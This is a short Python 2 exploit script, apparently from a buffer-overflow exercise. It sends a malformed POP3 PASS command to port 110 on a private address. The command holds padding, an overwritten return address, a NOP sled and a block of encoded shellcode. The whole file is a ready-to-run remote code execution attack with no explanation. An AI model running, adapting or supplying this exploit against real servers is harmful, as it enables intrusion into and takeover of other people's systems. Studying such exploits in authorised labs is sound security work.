import socket
string= "A"*2606 + "BBBB" + "C"*900

buf =  ""
buf += "\xd9\xcb\xbe\x2a\xbe\xde\xb8\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x52\x83\xc7\x04\x31\x77\x13\x03\x5d\xad\x3c"
buf += "\x4d\x5d\x39\x42\xae\x9d\xba\x23\x26\x78\x8b\x63\x5c"
buf += "\x09\xbc\x53\x16\x5f\x31\x1f\x7a\x4b\xc2\x6d\x53\x7c"
buf += "\x63\xdb\x85\xb3\x74\x70\xf5\xd2\xf6\x8b\x2a\x34\xc6"
buf += "\x43\x3f\x35\x0f\xb9\xb2\x67\xd8\xb5\x61\x97\x6d\x83"
buf += "\xb9\x1c\x3d\x05\xba\xc1\xf6\x24\xeb\x54\x8c\x7e\x2b"
buf += "\x57\x41\x0b\x62\x4f\x86\x36\x3c\xe4\x7c\xcc\xbf\x2c"
buf += "\x4d\x2d\x13\x11\x61\xdc\x6d\x56\x46\x3f\x18\xae\xb4"
buf += "\xc2\x1b\x75\xc6\x18\xa9\x6d\x60\xea\x09\x49\x90\x3f"
buf += "\xcf\x1a\x9e\xf4\x9b\x44\x83\x0b\x4f\xff\xbf\x80\x6e"
buf += "\x2f\x36\xd2\x54\xeb\x12\x80\xf5\xaa\xfe\x67\x09\xac"
buf += "\xa0\xd8\xaf\xa7\x4d\x0c\xc2\xea\x19\xe1\xef\x14\xda"
buf += "\x6d\x67\x67\xe8\x32\xd3\xef\x40\xba\xfd\xe8\xa7\x91"
buf += "\xba\x66\x56\x1a\xbb\xaf\x9d\x4e\xeb\xc7\x34\xef\x60"
buf += "\x17\xb8\x3a\x26\x47\x16\x95\x87\x37\xd6\x45\x60\x5d"
buf += "\xd9\xba\x90\x5e\x33\xd3\x3b\xa5\xd4\xd6\xb3\xac\x29"
buf += "\x8f\xc1\xae\x30\xf4\x4f\x48\x58\x1a\x06\xc3\xf5\x83"
buf += "\x03\x9f\x64\x4b\x9e\xda\xa7\xc7\x2d\x1b\x69\x20\x5b"
buf += "\x0f\x1e\xc0\x16\x6d\x89\xdf\x8c\x19\x55\x4d\x4b\xd9"
buf += "\x10\x6e\xc4\x8e\x75\x40\x1d\x5a\x68\xfb\xb7\x78\x71"
buf += "\x9d\xf0\x38\xae\x5e\xfe\xc1\x23\xda\x24\xd1\xfd\xe3"
buf += "\x60\x85\x51\xb2\x3e\x73\x14\x6c\xf1\x2d\xce\xc3\x5b"
buf += "\xb9\x97\x2f\x5c\xbf\x97\x65\x2a\x5f\x29\xd0\x6b\x60"
buf += "\x86\xb4\x7b\x19\xfa\x24\x83\xf0\xbe\x55\xce\x58\x96"
buf += "\xfd\x97\x09\xaa\x63\x28\xe4\xe9\x9d\xab\x0c\x92\x59"
buf += "\xb3\x65\x97\x26\x73\x96\xe5\x37\x16\x98\x5a\x37\x33"

buffer = ['A' * 2606+ '\xe3\x41\x4b\x5f' + '\x90' *16 + buf+ 'C' * (3500-2606-4-351-16)]
for string in buffer:
	print "sending evil buffer"
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	connect = s.connect(('192.168.9.52',110))
	s.recv(1024)
	s.send('USER test\r\n')
	s.recv(1024)
	s.send('PASS ' +string + '\r\n')
	s.send('QUIT\r\n')
	s.close()
	print('done')